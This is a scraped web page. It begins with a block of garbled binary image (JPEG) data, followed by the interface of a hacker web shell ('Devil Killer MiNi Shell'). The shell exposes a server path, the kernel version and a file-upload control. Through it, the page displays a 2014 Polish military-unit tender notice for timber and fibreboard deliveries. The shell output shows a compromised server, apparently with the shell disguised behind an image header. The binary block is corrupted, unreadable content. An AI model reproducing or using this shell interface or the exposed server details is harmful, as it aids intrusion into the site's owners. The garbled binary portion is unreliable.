JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140318/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140318/57349-N-2014.html

<p class="kh_header"><b>Giżycko: DOSTAWA TARCICY IGLASTEJ KLASA II, DREWNA ŻERDZIOWEGO i PŁYTY PILŚNIOWEJ Z PODZIAŁEM NA DWA ZADANIA</b><br>
<b>Numer ogłoszenia: 57349 - 2014; data zamieszczenia: 18.03.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Jednostka Wojskowa Nr 4352 , ul. Nowowiejska 20, 11-500 Giżycko, woj. warmińsko-mazurskie, tel. 87 429 46 02, faks 87 429 46 41.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.24wog.wp.mil.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Obrona.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWA TARCICY IGLASTEJ KLASA II, DREWNA ŻERDZIOWEGO i PŁYTY PILŚNIOWEJ Z PODZIAŁEM NA DWA ZADANIA.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest dostawa  tarcicy iglastej klasa II, płyty i drewna żerdziowego.
2.Zamówienie zostało podzielone na niżej wymienione dwa zadania części:
ZADANIE nr 1 -dostawa płyty pilśniowej. 
ZADANIE nr 2 -dostawa tarcicy iglastej klasa II i drewna żerdziowego.
3.Szczegółowy opis przedmiotu zamówienia Zadanie nr 1 - dostawa płyty pilśniowej:
3.1 Przedmiotem zamówienia jest dostawa płyty pilśniowej HDF i płyty pilśniowej twardej zgodnie z opisem zamieszczonym w tabeli poniżej. 
lp.Nazwa materiału - wyrobu
 wymagane dokumenty przy dostawie  okres przydatności do użycia 	jm.	Ilość
1Płyta pilśniowa HDF biała 2,8x2,07 5,796 m2
Grubość - 3 mm
dostawa do magazynu:
- Sekcji Obsługi Infrastruktury Gołdap - 45 m2
- Sekcja Zabezpieczenia Szkolenia - 10000 m2
- Sekcji Obsługi Infrastruktury Węgorzewo - 45 m2
dokumenty wymagane przy dostawie: DZCZ, atest higieny	m2	10085,04
2Płyta pilśniowa twarda HB klasa 1, grubość 3,2 mm
Wymiary 1220x2750 mm
dostawa do magazynu:
Sekcja Zabezpieczenia Szkolenia - 20 m2 	m2	23,184
Oznaczenia użyte w tabeli powyżej:
DZ CZ - deklaracja zgodności lub certyfikat zgodności
3.2	UWAGI DOTYCZĄCE DOSTAWY:
a)dostawca jest zobowiązany dostarczyć wraz z dostawą wszelkie gwarancje
producenta materiału, certyfikaty bezpieczeństwa, aprobaty techniczne, deklaracje lub certyfikaty zgodności . Wykonawca przekaże Zamawiającemu najpóźniej z chwilą dostarczenia towaru do magazynu JW. 4352 lub prześle je pocztą przed planowaną dostawą. Dokumenty muszą być sporządzone w języku polskim.
b Zamówiony towar należy dostarczyć do wskazanych magazynów od poniedziałku do czwartku wyłącznie w dni robocze od godz. 7 30 do godz. 13 00. O terminie dostawy należy powiadomić telefonicznie lub faksem : tel. fax. wg. według wykazu odbiorców na min. 48 godz. przed dostawą - dotyczy to również dostaw za pośrednictwem firm spedycyjnych.
c Dostawę należy realizować całościowo w danej pozycji asortymentowej. Materiały można dostarczyć na paletach przystosowanych do rozładunku wózkiem widłowym o udźwigu max. 1,2 tony. Palety, na których dostarczony zostanie towar w tym palety EURO i fabryczne nie podlegają zwrotowi. Należy ich koszt wliczyć w cenę towaru.
d W przypadku dostaw towaru za pośrednictwem firm spedycyjnych Zamawiający nie będzie kwitował odbioru towaru na dokumentach typu WZ przed dokładnym sprawdzeniem zawartości dostarczonych palet. należy uprzedzić dostawcę - przewoźnika.  
e)Wykonawca może wystawić fakturę VAT dopiero po dostarczeniu w całości danej pozycji asortymentowej do magazynu, zgodnie ze złożoną ofertą. Zamawiający nie dopuszcza faktur cząstkowych na dany asortyment materiału - wyrobu.
f)WYKAZ ODBIORCÓW adresatów:
Sekcja Obsługi Infrastruktury w Węgorzewie 
11-600 Węgorzewo, ul. Gen. Józefa Bema 16
Sekcja Obsługi Infrastruktury w Gołdapi 
19-500 Gołdap, ul. Wolności 8
Sekcja Zabezpieczenia Szkolenia
12-250 Orzysz
4.Szczegółowy opis przedmiotu zamówienia Zadanie nr 2 - dostawa tarcicy iglastej klasa II i drewna żerdziowego.
4.1 Przedmiotem zamówienia jest dostawa tarcicy iglastej sosnowej desek, bali 
i drewna sosnowego żerdziowego według sortymentu, klasy i ilości podanych 
w tabeli poniżej. 
lp.Nazwa materiału - wyrobu
 wymagane dokumenty przy dostawie  okres przydatności do użycia jm.	Ilość
1 Tarcica 25 mm obrzynana iglasta kl. II dł. 4-6 mb, impregnowane
- dostawa do magazynu:
Sekcji Obsługi Infrastruktury Węgorzewo  - 2 m3    	
Sekcji Obsługi Infrastruktury Giżycko  - 10 m3    
Sekcji Obsługi Infrastruktury Gołdap  - 2 m3    
 przy dostawie: oświadczenie o przeprowadzonej impregnacji metodą ciśnieniową oraz karta charakterystyki preparatu użytego do impregnacji 	
m3 14
2.Tarcica 50 mm obrzynana iglasta kl. II dł. 4-6 mb, impregnowane
- dostawa do magazynu:
Sekcji Sprzętu infrastruktury Suwałki  - 1,76 m3
Sekcji Sprzętu infrastruktury Węgorzewo - 2 m3
Sekcji Sprzętu infrastruktury Giżycko  - 30 m3    
Sekcji Sprzętu infrastruktury Gołdap  - 2 m3    
 przy dostawie: oświadczenie o przeprowadzonej impregnacji metodą ciśnieniową oraz karta charakterystyki preparatu użytego do impregnacji 	
m3 35,76
3.Krawędziak  140x140 mm  iglasty kl. I dł.6 mb, impregnowany
- 2 sztuki  minimalna długość  6 mb
- dostawa do magazynu:
Sekcji Sprzętu infrastruktury Suwałki  - 0,24 m3 
 przy dostawie: oświadczenie o przeprowadzonej impregnacji metodą ciśnieniową oraz karta charakterystyki preparatu użytego do impregnacji 
m3 0,24
4.Tarcica nieobrzynana 30 x 150mm, nie krótsza niż 3,5 mb lub wielokrotność
- dostawa do magazynu:
Sekcji Zabezpieczenia Szkolenia - 50 m3 
m3 50
5.Drewno sosnowe żerdziowe  fi 6 do 10cm, dł. 9 mb
- dostawa do magazynu:
Sekcji Zabezpieczenia Szkolenia - 5 m3
m3	5
6.Drewno sosnowe żerdziowe  fi 6 do 10cm, dł. 3 mb
- dostawa do magazynu:
Sekcji Zabezpieczenia Szkolenia - 25 m3	
m3 25
7.Tarcica 32 mm obrzynana iglasta kl. II 4,5 x 0,2 m, impregnowane
- dostawa do magazynu:
Sekcji Obsługi Infrastruktury Węgorzewo - 1 m3
Sekcji Obsługi Infrastruktury Giżycko  - 10 m3  
 przy dostawie: oświadczenie o przeprowadzonej impregnacji metodą ciśnieniową oraz karta charakterystyki preparatu użytego do impregnacji 	
m3 11
8.Tarcica 76 mm obrzynana iglasta kl. II6 x 0,2 m, impregnowane
 dostawa do magazynu:
Sekcji Obsługi Infrastruktury Węgorzewo  - 2 m3
Sekcji Obsługi Infrastruktury Giżycko  - 15 m3    
 przy dostawie: oświadczenie o przeprowadzonej impregnacji metodą ciśnieniową oraz karta charakterystyki preparatu użytego do impregnacji 	
m3 17
9.Tarcica 19 mm obrzynana iglasta kl. II dł. 4-6 mb, impregnowane
- dostawa do magazynu:
Sekcji Obsługi Infrastruktury Węgorzewo - 2 m 3 
 przy dostawie: oświadczenie o przeprowadzonej impregnacji metodą ciśnieniową oraz karta charakterystyki preparatu użytego do impregnacji 	
m3  2
10.Tarcica  95 mm obrzynana iglasta kl. II dł.3 mb, impregnowane
- dostawa do magazynu:
Sekcji Obsługi Infrastruktury Węgorzewo- 1 m3
przy dostawie: oświadczenie o przeprowadzonej impregnacji metodą ciśnieniową oraz karta charakterystyki preparatu użytego do impregnacji 	
m3 1
Wykonawca w arkuszu ofertowym ma podać jaka substancja chemiczna preparat zostanie zastosowana do impregnacji tarcicy poz. Nr 1, 2, 3, 6, 7, 8, 9. Preparat do impregnacji drewna musi posiadać atest higieniczny. Dokument stwierdzający, że została przeprowadzona impregnacja wraz z kartą charakterystyki preparatu chemicznego użytego do impregnacji Wykonawca ma dostarczyć do wszystkich SOI.
4.2 UWAGI DOTYCZĄCE ZAMÓWIENIA :
a Podane wymiary nominalne desek i bali odnoszą się do drewna o wilgotności 20% w stosunku do masy drewna zupełnie suchego. W przypadku innej wilgotności drewna należy uwzględnić nadmiary dla I grupy na zeschnięcie wg normy PN-57/D-03003.
b Wykonawca powinien przy wycenie przyjąć koszt tarcicy wraz z opakowaniem, koszt dostawy do magazynów poszczególnych SOI oraz koszt rozładunku we wskazanym przez Odbiorcę miejscu.
c Dostawę należy realizować całościowo w danej pozycji asortymentowej. Materiały można dostarczyć na paletach przystosowanych do rozładunku wózkiem widłowym o udźwigu max. 1,2 tony. Palety, na których dostarczony zostanie towar w tym palety EURO i fabryczne nie podlegają zwrotowi. Należy ich koszt wliczyć w cenę towaru.
4.3	UWAGI DOTYCZĄCE DOSTAWY :
a Na czole lub w przypadku braku miejsca, na jednej z płaszczyzn tuż przy czole tarcicy powinny być umieszczone na każdej sztuce w sposób trwały następujące znaki: 
- 1 zielony punkt - znak klasy jakości, 
 - 1 żółty punkt - znak zabezpieczenia środkami antyseptycznymi   przed sinizną.
b Wilgotność tarcicy desek i bali w pakietach nie większa niż 25, luzem nie większa niż 22 .
c Wykonawca może wystawić fakturę po dostarczeniu zamówionego asortymentu tarcicy do danego SOI i Sekcji Zabezpieczenia Szkolenia zgodnie ze złożoną ofertą. Wraz z dostawą tarcicy Wykonawca pozostawi pod wskazanym adresem kopię faktury, zaś oryginał faktury wraz z dokumentem typu WZ, na którym Kierownik SOI lub osoba przez niego upoważniona potwierdziła przyjęcie towaru pod względem ilościowym i jakościowym, dostarczy do kancelarii JW. 4352, adres: 11-500 Giżycko, ul. Nowowiejska 21. 
d Wykonawca przed dostawą tarcicy do magazynów musi uzgodnić termin 
i wielkość dostawy na minimum 48 godz. przed zaplanowaną dostawą. 
WYKAZ ODBIORCÓW adresatów
Sekcja Obsługi Infrastruktury w Węgorzewie 
11-600 Węgorzewo, ul. Gen. Józefa Bema 16
Sekcja Obsługi Infrastruktury w Gołdapi 
19-500 Gołdap, ul. Wolności 8
Sekcja Obsługi Infrastruktury w Suwałkach 
16-400 Suwałki, ul. Wojska Polskiego 21
Sekcja Obsługi Infrastruktury w Giżycku 
11-501 Giżycko, ul. Moniuszki 
Sekcja Zabezpieczenia Szkolenia
12-250 Orzysz.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 03.41.10.00-4, 03.41.90.00-0, 03.41.40.00-5, 44.19.14.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie jest wymagane w danym postepowaniu</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie żąda od wykonawców udowodnienia faktu posiadania uprawnień do wykonywania określonej działalności lub czynności, przyjmując jako dokument potwierdzający spełnianie tego warunku, podpisane oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu, co jest dopuszczone w art. 44 Ustawy Pzp</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie żąda od wykonawców udowodnienia faktu posiadania niezbędnej wiedzy i doświadczenia, przyjmując jako dokument potwierdzający spełnianie tego warunku, podpisane oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu, co jest dopuszczone w art. 44 Ustawy Pzp;</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie żąda od wykonawców udowodnienia faktu dysponowania niezbędnym potencjałem technicznym do wykonywania zamówienia, przyjmując jako dokument potwierdzający spełnianie tego warunku, podpisane oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu, co jest dopuszczone w art. 44 ustawy pzp;</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie żąda od wykonawców udowodnienia faktu dysponowania osobami zdolnymi do wykonywania zamówienia, przyjmując jako dokument potwierdzający spełnianie tego warunku, podpisane oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu, co jest dopuszczone w art. 44 ustawy pzp;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie żąda od wykonawców udowodnienia faktu znajdowania się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, przyjmując jako dokument potwierdzający spełnianie tego warunku, podpisane oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu, co jest dopuszczone w art. 44 Ustawy Pzp;</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Formularz ofertowy (załącznik nr 1 do SIWZ), Zestawienie cenowe - wypełnione i podpisane wg wzoru Zamawiającego (opcjonalnie do zadań Załączniki  2,3 do SIWZ), W przypadku gdy Wykonawca polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia - pisemne (w oryginale) zobowiązanie podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Niedopuszczalna jest pod rygorem nieważności istotna zmiana umowy oraz wprowadzanie do niej takich postanowień, które byłyby niekorzystne dla Zamawiającego, jeżeli przy ich uwzględnieniu należałoby zmienić treść oferty, na podstawie której dokonano wyboru Wykonawcy. 
2.Zamawiający zastrzega możliwość zmiany wysokości zobowiązania wynikającego z oferty Wykonawcy w przypadku zmiany stawki podatku od towarów i usług w 2014 r. 
3.Wszelkie zmiany umowy mogą być dokonywane jedynie za zgodą obu Stron, wyrażone na piśmie (aneks do umowy) pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.24wog.wp.mil.pl, www.bip.mon.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> JEDNOSTKA WOJSKOWA NR 4352 W GIŻYCKU,
ul. Nowowiejska 20, 11-500 GIŻYCKO budynek nr 5, pok. nr 6.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.03.2014 godzina 09:00, miejsce: JEDNOSTKA WOJSKOWA NR 4352 W GIŻYCKU,
ul. Nowowiejska 20, 11-500 GIŻYCKO. budynek nr 5, pok. 109, Kancelaria Jawna..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> dostawa płyty pilśniowej..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1 Przedmiotem zamówienia jest dostawa płyty pilśniowej HDF i płyty pilśniowej twardej zgodnie z opisem zamieszczonym w tabeli poniżej. 
lp.Nazwa materiału - wyrobu
 wymagane dokumenty przy dostawie  okres przydatności do użycia 	jm.	Ilość
1Płyta pilśniowa HDF biała 2,8x2,07 5,796 m2
Grubość - 3 mm
dostawa do magazynu:
- Sekcji Obsługi Infrastruktury Gołdap - 45 m2
- Sekcja Zabezpieczenia Szkolenia - 10000 m2
- Sekcji Obsługi Infrastruktury Węgorzewo - 45 m2
dokumenty wymagane przy dostawie: DZCZ, atest higieny	m2	10085,04
2Płyta pilśniowa twarda HB klasa 1, grubość 3,2 mm
Wymiary 1220x2750 mm
dostawa do magazynu:
Sekcja Zabezpieczenia Szkolenia - 20 m2 	m2	23,184
Oznaczenia użyte w tabeli powyżej:
DZ CZ - deklaracja zgodności lub certyfikat zgodności
3.2	UWAGI DOTYCZĄCE DOSTAWY:
a)dostawca jest zobowiązany dostarczyć wraz z dostawą wszelkie gwarancje
producenta materiału, certyfikaty bezpieczeństwa, aprobaty techniczne, deklaracje lub certyfikaty zgodności . Wykonawca przekaże Zamawiającemu najpóźniej z chwilą dostarczenia towaru do magazynu JW. 4352 lub prześle je pocztą przed planowaną dostawą. Dokumenty muszą być sporządzone w języku polskim.
b Zamówiony towar należy dostarczyć do wskazanych magazynów od poniedziałku do czwartku wyłącznie w dni robocze od godz. 7 30 do godz. 13 00. O terminie dostawy należy powiadomić telefonicznie lub faksem : tel. fax. wg. według wykazu odbiorców na min. 48 godz. przed dostawą - dotyczy to również dostaw za pośrednictwem firm spedycyjnych.
c Dostawę należy realizować całościowo w danej pozycji asortymentowej. Materiały można dostarczyć na paletach przystosowanych do rozładunku wózkiem widłowym o udźwigu max. 1,2 tony. Palety, na których dostarczony zostanie towar w tym palety EURO i fabryczne nie podlegają zwrotowi. Należy ich koszt wliczyć w cenę towaru.
d W przypadku dostaw towaru za pośrednictwem firm spedycyjnych Zamawiający nie będzie kwitował odbioru towaru na dokumentach typu WZ przed dokładnym sprawdzeniem zawartości dostarczonych palet. należy uprzedzić dostawcę - przewoźnika.  
